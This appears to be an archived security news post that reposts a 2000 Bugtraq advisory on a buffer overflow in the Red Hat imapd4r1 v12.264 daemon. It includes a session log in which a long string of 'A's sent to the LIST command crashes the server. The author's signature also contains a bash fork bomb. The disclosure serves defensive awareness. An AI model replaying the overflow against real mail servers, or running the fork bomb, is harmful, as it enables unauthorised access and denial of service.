Originally Published: Monday, 17 April 2000 Author: Alexander Reelsen
Published to: news_enhance_security/Security News Page: 1/1 - [Std View]

imapd4r1 v12.264 exploit

The imap daemon shipped with the newest redhat has a security hole, which allows the intruder to get shell access to the mail account.

From: Michal Zalewski Subject: imapd4r1 v12.264 To: BUGTRAQ@SECURITYFOCUS.COM

Newest RH:

* OK nimue IMAP4rev1 v12.264 server ready 1 login lcamtuf test 1 OK LOGIN completed 1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;]=20 Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? ()


Privledges seems to be dropped, but, anyway, it's nice way to get shell access to mail account, maybe grab some data from memory etc. I believe both imap and ipopd packages need code security audit.

_______________________________________________________ Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security] [http://lcamtuf.na.export.pl] <=3D--=3D> bash$ :(){ :|:&};: =3D-----=3D> God is real, unless declared integer. <=3D-----=3D